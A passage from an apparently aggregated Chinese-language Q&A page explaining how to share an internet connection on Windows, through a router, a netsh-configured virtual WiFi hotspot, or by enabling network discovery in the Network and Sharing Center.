確定之後,提供共享的網卡圖標旁會出現「共享的」字樣,表示「寬頻連接」已共享至「虛擬WiFi
4、開啟無線網路:
繼續在命令提示符中運行:netsh
wlan
start
hostednetwork
(將start改為stop即可關閉該無線網,以後開機後要啟用該無線網只需再次運行此命令即可)
至此,虛擬WiFi的紅叉叉消失,WiFi基站已組建好,主機設置完畢。筆記本、帶WiFi模塊的手機等子機搜索到無線網路yuchi,輸入密碼123,就能共享上網啦!
附:顯示無線網路信息命令:netsh
wlan
show
hostednetwork
希望採納!!
⑧ 電腦共享網路怎麼連接
您好,通過路由器實現網路共享
1
使用路由器實現網路共享是最常規的方法,下面就以TP-LINK WR740N無線路由器為例,介紹具體的使用方法。先將路由器按照下圖所示進行連接。
2
再進入控制面板→網路和共享中心→更改適配器設置,打開網路連接窗口。
3
找到「本地連接」對著本地連接點擊滑鼠右鍵選擇「屬性」,進入「本地連接屬性」窗口。
4
再雙擊「Internet 協議版本4」,打開TCP/IP4屬性窗口,將IP地址與DNS都設置為「自動獲取」,點擊「確定」退出。
將路由器翻轉過來,查看並記下底部銘牌上的管理登錄IP及管理登錄賬號。默認的管理IP一般為192.168.0.1或者192.168.1.1,默認的管理用戶名和密碼者是admin。
打開瀏覽器,在地址欄輸入管理IP,回車,彈出登錄界面,再輸入管理員賬號、密碼即可進入路由器的管理界面。
進入路由器的管理界面後,點擊左側導航處的「設置向導」,進入設置向導界面,點擊「下一步」進入上網方式設置,如果是撥號上網則選擇「PPPoE方式」,如果不清楚可選擇「由路由器自動選擇上網方式」,設置好之後點擊「下一步」。
設置好上網方式後,會進入詳細設置,根據選擇的上網方式的不同而不同。設置好之後會進入「無線設置」界面,在這里設置無線路由器的SSID及無線密碼(SSID即為在電腦無線列表中顯示的路由器名稱),再點擊下一步。
全部設置完成後點擊「完成」即可保存當前設置,這樣就可以正常使用無線路由器了,下面我們點擊電腦右下角托盤區域的無線網圖標,就可以搜索到剛才設置的WIFI網路,連接到這個WIFI網路就可以實現共享上網了。
通過筆記本電腦的無線網卡共享網路
前面介紹了通過路由器實現網路共享,如果沒有路由器呢?我們可以通過筆記本自帶的無線網卡實現軟AP功能,以實現網路共享功能,但使用此功能的前提是電腦的操作系統為Windows 7版本
點擊開始,在搜索框輸入CMD,再對著搜索結果點擊滑鼠右鍵,選擇「以管理員身份運行」,進入「命令提示符」窗口。
在「命令提示符」窗口輸入以下命令以啟用虛擬無線AP功能
netsh wlan set hostednetwork mode=allow ssid=英文網路名稱 key=密碼
註:密碼最少8位。
進入控制面板→網路和共享中心,找到當前已連接到Internet的網路連接,點擊滑鼠右鍵→屬性→共享,將「允許其他網路用戶通過此計算機的Internet連接來連接」勾選,然後將下面的「家庭網路連接」設置為「無線網路連接2」,點擊確定。
回到命令提示符窗口,再執行netsh wlan start hostednetwork命令就可以啟用這個虛擬WIFI功能,現在我們就可以搜索並連接這個「無線路由」了實現共享上網了。
⑨ 怎麼在電腦啟動網路發現和共享
1、打開電腦,在桌面上的左下角位置右擊Windows的開始按鈕,在彈出的黑色列表裡面選擇【控制面板】。
2、接著會彈出控制面板窗口,在窗口裡面選擇【網路和Internet】。
3、進入新的窗口頁面,選擇【網路和共享中心】,如圖所示:
4、在窗口的左側列表位置找到【更改高級共享設置】點擊選擇它。
5、這時就會出現發現共享的設置了,在網路發現裡面點擊選擇【啟用網路發現】。
6、最後不要忘記點擊右下角的【保存修改】,然後才會生效,接著就可以方便我們查找同一網路中的其他用戶了。
我們只需要依次打開控制面板——網路和Internet——網路和共享中心——更改高級共享設置,到這邊我們就可以看到網路發現了,這時候我們只需要啟動它然後保存修改就可以了。
成都聯創優科 幼兒園智能化解決方案提供商 為您解答
⑩ 網路和共享中心在哪裡打開
網路和共享中心是Windows系統電腦中的一項網路服務,在控制面板中找到並進入服務頁面。具體操作步驟如下:
工具/原料:小米筆記本Pro15.6,Windows11。
1、Windows+R運行窗口中輸入【control】並回車。